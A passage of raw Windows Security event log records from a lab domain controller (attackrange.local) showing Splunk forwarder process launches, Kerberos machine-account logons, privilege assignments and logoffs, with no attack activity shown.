SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264797
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11b0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264799
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x570
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264800
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264802
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf60
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264801
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1328
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264808
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870E2B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264807
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x870E2B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53705
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264806
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870E2B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264805
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870DBF
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264804
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x870DBF
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53704
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:24 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264803
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x870DBF
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264811
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x871AB3
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264810
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x871AB3
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53713
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:37:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264809
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x871AB3
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:38:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264812
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1034
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264814
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19a8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264813
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1af0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264815
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264816
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1754
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264818
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x338
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264817
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1858
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264821
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8754C4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264820
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8754C4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53726
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:38:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264819
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8754C4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:39:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
